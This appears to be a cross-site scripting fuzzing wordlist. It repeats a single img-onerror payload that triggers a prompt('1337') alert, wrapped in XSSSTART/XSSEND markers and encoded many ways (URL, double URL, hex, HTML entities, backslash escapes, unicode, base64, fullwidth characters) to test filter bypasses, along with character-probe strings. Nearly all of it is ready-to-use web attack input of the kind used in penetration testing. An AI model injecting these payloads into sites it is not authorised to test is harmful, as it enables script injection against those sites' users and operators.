XSSSTART'"--><img src=x onerror=prompt(`1337`)>XSSEND
XSSSTART%27%22--%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28%601337%60%29%3EXSSEND
XSSSTART%2527%2522--%253E%253Cimg%2520src%253Dx%2520onerror%253Dprompt%2528%25601337%2560%2529%253EXSSEND
%58%53%53%53%54%41%52%54%27%22%2d%2d%3e%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%70%72%6f%6d%70%74%28%60%31%33%33%37%60%29%3e%58%53%53%45%4e%44
585353535441525427222d2d3e3c696d67207372633d78206f6e6572726f723d70726f6d707428603133333760293e585353454e44
XSSSTART&#39;&quot;--&gt;&lt;img src=x onerror=prompt(`1337`)&gt;XSSEND
XSSSTART\'\"--><img src=x onerror=prompt(`1337`)>XSSEND
XSSSTART&#x27;&#x22;--&#x3E;&#x3C;img src=x onerror=prompt(&#x60;1337&#x60;)&#x3E;XSSEND
XSSSTART<'"`1337`'">XSSEND
XSSSTART&#x3C;&#x27;&#x22;&#x60;1337&#x60;&#x27;&#x22;&#x3E;XSSEND
XSSSTART&amp;#x3C;&amp;#x27;&amp;#x22;&amp;#x60;1337&amp;#x60;&amp;#x27;&amp;#x22;&amp;#x3E;XSSEND
XSSSTART%3C%27%22%601337%60%27%22%3EXSSEND
XSSSTART%253C%2527%2522%25601337%2560%2527%2522%253EXSSEND
XSSSTARTPCciYDEzMzdgJyI+XSSEND
XSSSTART&lt;'&quot;`1337`'&quot;&gt;XSSEND
XSSSTART3c272260313333376027223eXSSEND
XSSSTART\x3C\x27\x22\x60\x31\x33\x33\x37\x60\x27\x22\x3EXSSEND
XSSSTART'<\'"`1337`\'">'XSSEND
XSSSTART<\'\"`1337`\'\">XSSEND
XSSSTART\u003c\u0027\u0022\u0060\u0031\u0033\u0033\u0037\u0060\u0027\u0022\u003eXSSEND
XSSSTART0000003c000000270000002200000060000000310000003300000033000000370000006000000027000000220000003eXSSEND
XSSSTART000600003900034000960004900051000510005500096000390003400062XSSEND
XSSSTART&#60;&#39;&#34;&#96;1337&#96;&#34;&#39;&#62;XSSEND
XSSSTART%EF%BC%9C%CA%B9%CA%BA`1337`%CA%BA%CA%B9%EF%BC%9EXSSEND
WFNTU1RBUlQ8JyJgMTMzN2AnIj5YU1NFTkQ=a